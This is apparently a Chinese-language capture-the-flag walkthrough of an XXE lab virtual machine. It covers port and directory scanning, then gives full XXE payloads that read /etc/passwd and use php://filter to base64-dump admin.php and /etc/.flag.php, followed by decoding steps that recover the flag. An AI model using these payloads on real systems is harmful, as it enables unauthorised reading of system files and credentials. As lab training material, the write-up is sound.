1.导入打开虚拟机 然后没账号密码~
虚拟机虚拟网络编辑器是net 可以知道虚拟机的ip池
直接拿工具扫描端口 御剑 Zenmap namp 都可以
然后打开这个端口
扫描一下目录发现有个robots.txt
有个/xxe/应该是个路径 打开看看 admin.php是个文件
有个登录 试了试弱口令没办法 抓个包看看
xml ??发送到repeater模块 修改一下xml代码部分
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "file:///etc/passwd">
]>
<root><name>&sp;</name><password>hj</password></root>
这里知道有漏洞 那如何利用 试试admin.php
php://filter/read
构造xml 在之前的爬虫文件中有一个admin.php的管理员登陆界面,读取一下他
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "php://filter/read=convert.base64-encode/resource=admin.php">
]>
<root><name>&sp;</name><password>hj</password></root>
这个是用base64获取的源码 去解码
这个密码也是md5加密过的
登录成功
有个flag 点了一下跳转没了 看看网页源代码
源码PD9waHAKJGZsYWcgPSAiPCEtLSB0aGUgZmxhZyBpbiAoSlFaRk1NQ1pQRTRIS1dUTlBCVUZVNkpWTzVRVVFRSjUpIC0tPiI7CmVjaG8gJGZsYWc7Cj8+Cg== not available!
这段密文需要解码
JQZFMMCZPE4HKWTNPBUFU6JVO5QUQQJ5
然后还需要base32解密--》 base64解密
L2V0Yy8uZmxhZy5waHA=
发现是一个路径
/etc/.flag.php
老方法xml读取
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/.flag.php">
]>
<root><name>&sp;</name><password>hj</password></root>
解码之后是这个
放在phpstudy www目录下
出来之后报错 但是密码在
